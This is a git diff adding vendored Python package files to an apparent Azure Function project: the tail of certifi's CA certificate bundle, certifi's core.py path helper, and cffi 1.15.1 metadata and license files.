+c3QlMjBHbWJILEM9REU/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDAKBggqhkjO +PQQDAwNpADBmAjEAlJAtE/rhY/hhY+ithXhUkZy4kzg+GkHaQBZTQgjKL47xPoFW +wKrY7RjEsK70PvomAjEA8yjixtsrmfu3Ubgko6SUeho/5jbiA1czijDLgsfWFBHV +dWNbFJWcHwHP2NVypw87 +-----END CERTIFICATE----- + +# Issuer: CN=D-TRUST EV Root CA 1 2020 O=D-Trust GmbH +# Subject: CN=D-TRUST EV Root CA 1 2020 O=D-Trust GmbH +# Label: "D-TRUST EV Root CA 1 2020" +# Serial: 126288379621884218666039612629459926992 +# MD5 Fingerprint: 8c:2d:9d:70:9f:48:99:11:06:11:fb:e9:cb:30:c0:6e +# SHA1 Fingerprint: 61:db:8c:21:59:69:03:90:d8:7c:9c:12:86:54:cf:9d:3d:f4:dd:07 +# SHA256 Fingerprint: 08:17:0d:1a:a3:64:53:90:1a:2f:95:92:45:e3:47:db:0c:8d:37:ab:aa:bc:56:b8:1a:a1:00:dc:95:89:70:db +-----BEGIN CERTIFICATE----- +MIIC2zCCAmCgAwIBAgIQXwJB13qHfEwDo6yWjfv/0DAKBggqhkjOPQQDAzBIMQsw +CQYDVQQGEwJERTEVMBMGA1UEChMMRC1UcnVzdCBHbWJIMSIwIAYDVQQDExlELVRS +VVNUIEVWIFJvb3QgQ0EgMSAyMDIwMB4XDTIwMDIxMTEwMDAwMFoXDTM1MDIxMTA5 +NTk1OVowSDELMAkGA1UEBhMCREUxFTATBgNVBAoTDEQtVHJ1c3QgR21iSDEiMCAG +A1UEAxMZRC1UUlVTVCBFViBSb290IENBIDEgMjAyMDB2MBAGByqGSM49AgEGBSuB +BAAiA2IABPEL3YZDIBnfl4XoIkqbz52Yv7QFJsnL46bSj8WeeHsxiamJrSc8ZRCC +/N/DnU7wMyPE0jL1HLDfMxddxfCxivnvubcUyilKwg+pf3VlSSowZ/Rk99Yad9rD +wpdhQntJraOCAQ0wggEJMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFH8QARY3 +OqQo5FD4pPfsazK2/umLMA4GA1UdDwEB/wQEAwIBBjCBxgYDVR0fBIG+MIG7MD6g +PKA6hjhodHRwOi8vY3JsLmQtdHJ1c3QubmV0L2NybC9kLXRydXN0X2V2X3Jvb3Rf +Y2FfMV8yMDIwLmNybDB5oHegdYZzbGRhcDovL2RpcmVjdG9yeS5kLXRydXN0Lm5l +dC9DTj1ELVRSVVNUJTIwRVYlMjBSb290JTIwQ0ElMjAxJTIwMjAyMCxPPUQtVHJ1 +c3QlMjBHbWJILEM9REU/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlzdDAKBggqhkjO +PQQDAwNpADBmAjEAyjzGKnXCXnViOTYAYFqLwZOZzNnbQTs7h5kXO9XMT8oi96CA +y/m0sRtW9XLS/BnRAjEAkfcwkz8QRitxpNA7RJvAKQIFskF3UfN5Wp6OFKBOQtJb +gfM0agPnIjhQW+0ZT0MW +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert TLS ECC P384 Root G5 O=DigiCert, Inc. +# Subject: CN=DigiCert TLS ECC P384 Root G5 O=DigiCert, Inc. +# Label: "DigiCert TLS ECC P384 Root G5" +# Serial: 13129116028163249804115411775095713523 +# MD5 Fingerprint: d3:71:04:6a:43:1c:db:a6:59:e1:a8:a3:aa:c5:71:ed +# SHA1 Fingerprint: 17:f3:de:5e:9f:0f:19:e9:8e:f6:1f:32:26:6e:20:c4:07:ae:30:ee +# SHA256 Fingerprint: 01:8e:13:f0:77:25:32:cf:80:9b:d1:b1:72:81:86:72:83:fc:48:c6:e1:3b:e9:c6:98:12:85:4a:49:0c:1b:05 +-----BEGIN CERTIFICATE----- +MIICGTCCAZ+gAwIBAgIQCeCTZaz32ci5PhwLBCou8zAKBggqhkjOPQQDAzBOMQsw +CQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xJjAkBgNVBAMTHURp +Z2lDZXJ0IFRMUyBFQ0MgUDM4NCBSb290IEc1MB4XDTIxMDExNTAwMDAwMFoXDTQ2 +MDExNDIzNTk1OVowTjELMAkGA1UEBhMCVVMxFzAVBgNVBAoTDkRpZ2lDZXJ0LCBJ +bmMuMSYwJAYDVQQDEx1EaWdpQ2VydCBUTFMgRUNDIFAzODQgUm9vdCBHNTB2MBAG +ByqGSM49AgEGBSuBBAAiA2IABMFEoc8Rl1Ca3iOCNQfN0MsYndLxf3c1TzvdlHJS +7cI7+Oz6e2tYIOyZrsn8aLN1udsJ7MgT9U7GCh1mMEy7H0cKPGEQQil8pQgO4CLp +0zVozptjn4S1mU1YoI71VOeVyaNCMEAwHQYDVR0OBBYEFMFRRVBZqz7nLFr6ICIS +B4CIfBFqMA4GA1UdDwEB/wQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MAoGCCqGSM49 +BAMDA2gAMGUCMQCJao1H5+z8blUD2WdsJk6Dxv3J+ysTvLd6jLRl0mlpYxNjOyZQ +LgGheQaRnUi/wr4CMEfDFXuxoJGZSZOoPHzoRgaLLPIxAJSdYsiJvRmEFOml+wG4 +DXZDjC5Ty3zfDBeWUA== +-----END CERTIFICATE----- + +# Issuer: CN=DigiCert TLS RSA4096 Root G5 O=DigiCert, Inc. +# Subject: CN=DigiCert TLS RSA4096 Root G5 O=DigiCert, Inc. +# Label: "DigiCert TLS RSA4096 Root G5" +# Serial: 11930366277458970227240571539258396554 +# MD5 Fingerprint: ac:fe:f7:34:96:a9:f2:b3:b4:12:4b:e4:27:41:6f:e1 +# SHA1 Fingerprint: a7:88:49:dc:5d:7c:75:8c:8c:de:39:98:56:b3:aa:d0:b2:a5:71:35 +# SHA256 Fingerprint: 37:1a:00:dc:05:33:b3:72:1a:7e:eb:40:e8:41:9e:70:79:9d:2b:0a:0f:2c:1d:80:69:31:65:f7:ce:c4:ad:75 +-----BEGIN CERTIFICATE----- +MIIFZjCCA06gAwIBAgIQCPm0eKj6ftpqMzeJ3nzPijANBgkqhkiG9w0BAQwFADBN +MQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQsIEluYy4xJTAjBgNVBAMT +HERpZ2lDZXJ0IFRMUyBSU0E0MDk2IFJvb3QgRzUwHhcNMjEwMTE1MDAwMDAwWhcN +NDYwMTE0MjM1OTU5WjBNMQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQs +IEluYy4xJTAjBgNVBAMTHERpZ2lDZXJ0IFRMUyBSU0E0MDk2IFJvb3QgRzUwggIi +MA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCz0PTJeRGd/fxmgefM1eS87IE+ +ajWOLrfn3q/5B03PMJ3qCQuZvWxX2hhKuHisOjmopkisLnLlvevxGs3npAOpPxG0 +2C+JFvuUAT27L/gTBaF4HI4o4EXgg/RZG5Wzrn4DReW+wkL+7vI8toUTmDKdFqgp +wgscONyfMXdcvyej/Cestyu9dJsXLfKB2l2w4SMXPohKEiPQ6s+d3gMXsUJKoBZM +pG2T6T867jp8nVid9E6P/DsjyG244gXazOvswzH016cpVIDPRFtMbzCe88zdH5RD +nU1/cHAN1DrRN/BsnZvAFJNY781BOHW8EwOVfH/jXOnVDdXifBBiqmvwPXbzP6Po +sMH976pXTayGpxi0KcEsDr9kvimM2AItzVwv8n/vFfQMFawKsPHTDU9qTXeXAaDx +Zre3zu/O7Oyldcqs4+Fj97ihBMi8ez9dLRYiVu1ISf6nL3kwJZu6ay0/nTvEF+cd +Lvvyz6b84xQslpghjLSR6Rlgg/IwKwZzUNWYOwbpx4oMYIwo+FKbbuH2TbsGJJvX +KyY//SovcfXWJL5/MZ4PbeiPT02jP/816t9JXkGPhvnxd3lLG7SjXi/7RgLQZhNe +XoVPzthwiHvOAbWWl9fNff2C+MIkwcoBOU+NosEUQB+cZtUMCUbW8tDRSHZWOkPL +tgoRObqME2wGtZ7P6wIDAQABo0IwQDAdBgNVHQ4EFgQUUTMc7TZArxfTJc1paPKv +TiM+s0EwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcN +AQEMBQADggIBAGCmr1tfV9qJ20tQqcQjNSH/0GEwhJG3PxDPJY7Jv0Y02cEhJhxw +GXIeo8mH/qlDZJY6yFMECrZBu8RHANmfGBg7sg7zNOok992vIGCukihfNudd5N7H +PNtQOa27PShNlnx2xlv0wdsUpasZYgcYQF+Xkdycx6u1UQ3maVNVzDl92sURVXLF +O4uJ+DQtpBflF+aZfTCIITfNMBc9uPK8qHWgQ9w+iUuQrm0D4ByjoJYJu32jtyoQ +REtGBzRj7TG5BO6jm5qu5jF49OokYTurWGT/u4cnYiWB39yhL/btp/96j1EuMPik +AdKFOV8BmZZvWltwGUb+hmA+rYAQCd05JS9Yf7vSdPD3Rh9GOUrYU9DzLjtxpdRv +/PNn5AeP3SYZ4Y1b+qOTEZvpyDrDVWiakuFSdjjo4bq9+0/V77PnSIMx8IIh47a+ +p6tv75/fTM8BuGJqIz3nCU2AG3swpMPdB380vqQmsvZB6Akd4yCYqjdP//fx4ilw +MUc/dNAUFvohigLVigmUdy7yWSiLfFCSCmZ4OIN1xLVaqBHG5cGdZlXPU8Sv13WF +qUITVuwhd4GTWgzqltlJyqEI8pc7bZsEGCREjnwB8twl2F6GmrE52/WRMmrRpnCK +ovfepEWFJqgejF0pW8hL2JpqA15w8oVPbEtoL8pU9ozaMv7Da4M/OMZ+ +-----END CERTIFICATE----- + +# Issuer: CN=Certainly Root R1 O=Certainly +# Subject: CN=Certainly Root R1 O=Certainly +# Label: "Certainly Root R1" +# Serial: 188833316161142517227353805653483829216 +# MD5 Fingerprint: 07:70:d4:3e:82:87:a0:fa:33:36:13:f4:fa:33:e7:12 +# SHA1 Fingerprint: a0:50:ee:0f:28:71:f4:27:b2:12:6d:6f:50:96:25:ba:cc:86:42:af +# SHA256 Fingerprint: 77:b8:2c:d8:64:4c:43:05:f7:ac:c5:cb:15:6b:45:67:50:04:03:3d:51:c6:0c:62:02:a8:e0:c3:34:67:d3:a0 +-----BEGIN CERTIFICATE----- +MIIFRzCCAy+gAwIBAgIRAI4P+UuQcWhlM1T01EQ5t+AwDQYJKoZIhvcNAQELBQAw +PTELMAkGA1UEBhMCVVMxEjAQBgNVBAoTCUNlcnRhaW5seTEaMBgGA1UEAxMRQ2Vy +dGFpbmx5IFJvb3QgUjEwHhcNMjEwNDAxMDAwMDAwWhcNNDYwNDAxMDAwMDAwWjA9 +MQswCQYDVQQGEwJVUzESMBAGA1UEChMJQ2VydGFpbmx5MRowGAYDVQQDExFDZXJ0 +YWlubHkgUm9vdCBSMTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBANA2 +1B/q3avk0bbm+yLA3RMNansiExyXPGhjZjKcA7WNpIGD2ngwEc/csiu+kr+O5MQT +vqRoTNoCaBZ0vrLdBORrKt03H2As2/X3oXyVtwxwhi7xOu9S98zTm/mLvg7fMbed +aFySpvXl8wo0tf97ouSHocavFwDvA5HtqRxOcT3Si2yJ9HiG5mpJoM610rCrm/b0 +1C7jcvk2xusVtyWMOvwlDbMicyF0yEqWYZL1LwsYpfSt4u5BvQF5+paMjRcCMLT5 +r3gajLQ2EBAHBXDQ9DGQilHFhiZ5shGIXsXwClTNSaa/ApzSRKft43jvRl5tcdF5 +cBxGX1HpyTfcX35pe0HfNEXgO4T0oYoKNp43zGJS4YkNKPl6I7ENPT2a/Z2B7yyQ +wHtETrtJ4A5KVpK8y7XdeReJkd5hiXSSqOMyhb5OhaRLWcsrxXiOcVTQAjeZjOVJ +6uBUcqQRBi8LjMFbvrWhsFNunLhgkR9Za/kt9JQKl7XsxXYDVBtlUrpMklZRNaBA +2CnbrlJ2Oy0wQJuK0EJWtLeIAaSHO1OWzaMWj/Nmqhexx2DgwUMFDO6bW2BvBlyH +Wyf5QBGenDPBt+U1VwV/J84XIIwc/PH72jEpSe31C4SnT8H2TsIonPru4K8H+zMR +eiFPCyEQtkA6qyI6BJyLm4SGcprSp6XEtHWRqSsjAgMBAAGjQjBAMA4GA1UdDwEB +/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBTgqj8ljZ9EXME66C6u +d0yEPmcM9DANBgkqhkiG9w0BAQsFAAOCAgEAuVevuBLaV4OPaAszHQNTVfSVcOQr +PbA56/qJYv331hgELyE03fFo8NWWWt7CgKPBjcZq91l3rhVkz1t5BXdm6ozTaw3d +8VkswTOlMIAVRQdFGjEitpIAq5lNOo93r6kiyi9jyhXWx8bwPWz8HA2YEGGeEaIi +1wrykXprOQ4vMMM2SZ/g6Q8CRFA3lFV96p/2O7qUpUzpvD5RtOjKkjZUbVwlKNrd +rRT90+7iIgXr0PK3aBLXWopBGsaSpVo7Y0VPv+E6dyIvXL9G+VoDhRNCX8reU9di +taY1BMJH/5n9hN9czulegChB8n3nHpDYT3Y+gjwN/KUD+nsa2UUeYNrEjvn8K8l7 +lcUq/6qJ34IxD3L/DCfXCh5WAFAeDJDBlrXYFIW7pw0WwfgHJBu6haEaBQmAupVj +yTrsJZ9/nbqkRxWbRHDxakvWOF5D8xh+UG7pWijmZeZ3Gzr9Hb4DJqPb1OG7fpYn +Kx3upPvaJVQTA945xsMfTZDsjxtK0hzthZU4UHlG1sGQUDGpXJpuHfUzVounmdLy +yCwzk5Iwx06MZTMQZBf9JBeW0Y3COmor6xOLRPIh80oat3df1+2IpHLlOR+Vnb5n +wXARPbv0+Em34yaXOp/SX3z7wJl8OSngex2/DaeP0ik0biQVy96QXr8axGbqwua6 +OV+KmalBWQewLK8= +-----END CERTIFICATE----- + +# Issuer: CN=Certainly Root E1 O=Certainly +# Subject: CN=Certainly Root E1 O=Certainly +# Label: "Certainly Root E1" +# Serial: 8168531406727139161245376702891150584 +# MD5 Fingerprint: 0a:9e:ca:cd:3e:52:50:c6:36:f3:4b:a3:ed:a7:53:e9 +# SHA1 Fingerprint: f9:e1:6d:dc:01:89:cf:d5:82:45:63:3e:c5:37:7d:c2:eb:93:6f:2b +# SHA256 Fingerprint: b4:58:5f:22:e4:ac:75:6a:4e:86:12:a1:36:1c:5d:9d:03:1a:93:fd:84:fe:bb:77:8f:a3:06:8b:0f:c4:2d:c2 +-----BEGIN CERTIFICATE----- +MIIB9zCCAX2gAwIBAgIQBiUzsUcDMydc+Y2aub/M+DAKBggqhkjOPQQDAzA9MQsw +CQYDVQQGEwJVUzESMBAGA1UEChMJQ2VydGFpbmx5MRowGAYDVQQDExFDZXJ0YWlu +bHkgUm9vdCBFMTAeFw0yMTA0MDEwMDAwMDBaFw00NjA0MDEwMDAwMDBaMD0xCzAJ +BgNVBAYTAlVTMRIwEAYDVQQKEwlDZXJ0YWlubHkxGjAYBgNVBAMTEUNlcnRhaW5s +eSBSb290IEUxMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAE3m/4fxzf7flHh4axpMCK ++IKXgOqPyEpeKn2IaKcBYhSRJHpcnqMXfYqGITQYUBsQ3tA3SybHGWCA6TS9YBk2 +QNYphwk8kXr2vBMj3VlOBF7PyAIcGFPBMdjaIOlEjeR2o0IwQDAOBgNVHQ8BAf8E +BAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHQ4EFgQU8ygYy2R17ikq6+2uI1g4 +hevIIgcwCgYIKoZIzj0EAwMDaAAwZQIxALGOWiDDshliTd6wT99u0nCK8Z9+aozm +ut6Dacpps6kFtZaSF4fC0urQe87YQVt8rgIwRt7qy12a7DLCZRawTDBcMPPaTnOG +BtjOiQRINzf43TNRnXCve1XYAS59BWQOhriR +-----END CERTIFICATE----- + +# Issuer: CN=E-Tugra Global Root CA RSA v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Subject: CN=E-Tugra Global Root CA RSA v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Label: "E-Tugra Global Root CA RSA v3" +# Serial: 75951268308633135324246244059508261641472512052 +# MD5 Fingerprint: 22:be:10:f6:c2:f8:03:88:73:5f:33:29:47:28:47:a4 +# SHA1 Fingerprint: e9:a8:5d:22:14:52:1c:5b:aa:0a:b4:be:24:6a:23:8a:c9:ba:e2:a9 +# SHA256 Fingerprint: ef:66:b0:b1:0a:3c:db:9f:2e:36:48:c7:6b:d2:af:18:ea:d2:bf:e6:f1:17:65:5e:28:c4:06:0d:a1:a3:f4:c2 +-----BEGIN CERTIFICATE----- +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 +-----END CERTIFICATE----- + +# Issuer: CN=E-Tugra Global Root CA ECC v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Subject: CN=E-Tugra Global Root CA ECC v3 O=E-Tugra EBG A.S. OU=E-Tugra Trust Center +# Label: "E-Tugra Global Root CA ECC v3" +# Serial: 218504919822255052842371958738296604628416471745 +# MD5 Fingerprint: 46:bc:81:bb:f1:b5:1e:f7:4b:96:bc:14:e2:e7:27:64 +# SHA1 Fingerprint: 8a:2f:af:57:53:b1:b0:e6:a1:04:ec:5b:6a:69:71:6d:f6:1c:e2:84 +# SHA256 Fingerprint: 87:3f:46:85:fa:7f:56:36:25:25:2e:6d:36:bc:d7:f1:6f:c2:49:51:f2:64:e4:7e:1b:95:4f:49:08:cd:ca:13 +-----BEGIN CERTIFICATE----- +MIICpTCCAiqgAwIBAgIUJkYZdzHhT28oNt45UYbm1JeIIsEwCgYIKoZIzj0EAwMw +gYAxCzAJBgNVBAYTAlRSMQ8wDQYDVQQHEwZBbmthcmExGTAXBgNVBAoTEEUtVHVn +cmEgRUJHIEEuUy4xHTAbBgNVBAsTFEUtVHVncmEgVHJ1c3QgQ2VudGVyMSYwJAYD +VQQDEx1FLVR1Z3JhIEdsb2JhbCBSb290IENBIEVDQyB2MzAeFw0yMDAzMTgwOTQ2 +NThaFw00NTAzMTIwOTQ2NThaMIGAMQswCQYDVQQGEwJUUjEPMA0GA1UEBxMGQW5r +YXJhMRkwFwYDVQQKExBFLVR1Z3JhIEVCRyBBLlMuMR0wGwYDVQQLExRFLVR1Z3Jh +IFRydXN0IENlbnRlcjEmMCQGA1UEAxMdRS1UdWdyYSBHbG9iYWwgUm9vdCBDQSBF +Q0MgdjMwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAASOmCm/xxAeJ9urA8woLNheSBkQ +KczLWYHMjLiSF4mDKpL2w6QdTGLVn9agRtwcvHbB40fQWxPa56WzZkjnIZpKT4YK +fWzqTTKACrJ6CZtpS5iB4i7sAnCWH/31Rs7K3IKjYzBhMA8GA1UdEwEB/wQFMAMB +Af8wHwYDVR0jBBgwFoAU/4Ixcj75xGZsrTie0bBRiKWQzPUwHQYDVR0OBBYEFP+C +MXI++cRmbK04ntGwUYilkMz1MA4GA1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNp +ADBmAjEA5gVYaWHlLcoNy/EZCL3W/VGSGn5jVASQkZo1kTmZ+gepZpO6yGjUij/6 +7W4WAie3AjEA3VoXK3YdZUKWpqxdinlW2Iob35reX8dQj7FbcQwm32pAAOwzkSFx +vmjkI6TZraE3 +-----END CERTIFICATE----- diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/core.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/core.py new file mode 100644 index 0000000..2b2b802 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/core.py @@ -0,0 +1,68 @@ +""" +certifi.py +~~~~~~~~~~ + +This module returns the installation location of cacert.pem or its contents. +""" +import os +import types +from typing import Union + +try: + from importlib.resources import path as get_path, read_text + + _CACERT_CTX = None + _CACERT_PATH = None + + def where() -> str: + # This is slightly terrible, but we want to delay extracting the file + # in cases where we're inside of a zipimport situation until someone + # actually calls where(), but we don't want to re-extract the file + # on every call of where(), so we'll do it once then store it in a + # global variable. + global _CACERT_CTX + global _CACERT_PATH + if _CACERT_PATH is None: + # This is slightly janky, the importlib.resources API wants you to + # manage the cleanup of this file, so it doesn't actually return a + # path, it returns a context manager that will give you the path + # when you enter it and will do any cleanup when you leave it. In + # the common case of not needing a temporary file, it will just + # return the file system location and the __exit__() is a no-op. + # + # We also have to hold onto the actual context manager, because + # it will do the cleanup whenever it gets garbage collected, so + # we will also store that at the global level as well. + _CACERT_CTX = get_path("certifi", "cacert.pem") + _CACERT_PATH = str(_CACERT_CTX.__enter__()) + + return _CACERT_PATH + + +except ImportError: + Package = Union[types.ModuleType, str] + Resource = Union[str, "os.PathLike"] + + # This fallback will work for Python versions prior to 3.7 that lack the + # importlib.resources module but relies on the existing `where` function + # so won't address issues with environments like PyOxidizer that don't set + # __file__ on modules. + def read_text( + package: Package, + resource: Resource, + encoding: str = 'utf-8', + errors: str = 'strict' + ) -> str: + with open(where(), encoding=encoding) as data: + return data.read() + + # If we don't have importlib.resources, then we will just do the old logic + # of assuming we're on the filesystem and munge the path directly. + def where() -> str: + f = os.path.dirname(__file__) + + return os.path.join(f, "cacert.pem") + + +def contents() -> str: + return read_text("certifi", "cacert.pem", encoding="ascii") diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/certifi/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/LICENSE new file mode 100644 index 0000000..e705745 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/LICENSE @@ -0,0 +1,26 @@ + +Except when otherwise stated (look for LICENSE files in directories or +information at the beginning of each file) all software and +documentation is licensed as follows: + + The MIT License + + Permission is hereby granted, free of charge, to any person + obtaining a copy of this software and associated documentation + files (the "Software"), to deal in the Software without + restriction, including without limitation the rights to use, + copy, modify, merge, publish, distribute, sublicense, and/or + sell copies of the Software, and to permit persons to whom the + Software is furnished to do so, subject to the following conditions: + + The above copyright notice and this permission notice shall be included + in all copies or substantial portions of the Software. + + THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS + OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING + FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER + DEALINGS IN THE SOFTWARE. + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/METADATA new file mode 100644 index 0000000..3e4d090 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/METADATA @@ -0,0 +1,34 @@ +Metadata-Version: 2.1 +Name: cffi +Version: 1.15.1 +Summary: Foreign Function Interface for Python calling C code. +Home-page: http://cffi.readthedocs.org +Author: Armin Rigo, Maciej Fijalkowski +Author-email: python-cffi@googlegroups.com +License: MIT +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 2 +Classifier: Programming Language :: Python :: 2.7 +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: License :: OSI Approved :: MIT License +License-File: LICENSE +Requires-Dist: pycparser + + +CFFI +==== + +Foreign Function Interface for Python calling C code. +Please see the `Documentation `_. + +Contact +------- + +`Mailing list `_ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/RECORD new file mode 100644 index 0000000..d380c8f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi-1.15.1.dist-info/RECORD @@ -0,0 +1,44 @@ +_cffi_backend.cpython-39-x86_64-linux-gnu.so,sha256=qsQ76hjYdszjTdFV9NI0mnEkr6uMz56ZMzB7JbnKVTg,981144 +cffi-1.15.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +cffi-1.15.1.dist-info/LICENSE,sha256=BLgPWwd7vtaICM_rreteNSPyqMmpZJXFh72W3x6sKjM,1294 +cffi-1.15.1.dist-info/METADATA,sha256=KP4G3WmavRgDGwD2b8Y_eDsM1YeV6ckcG6Alz3-D8VY,1144 +cffi-1.15.1.dist-info/RECORD,, +cffi-1.15.1.dist-info/WHEEL,sha256=FNUt4eBsrBVn_Yc5KG3aXtKE40X3uNZrbGLNCbVxyFw,148 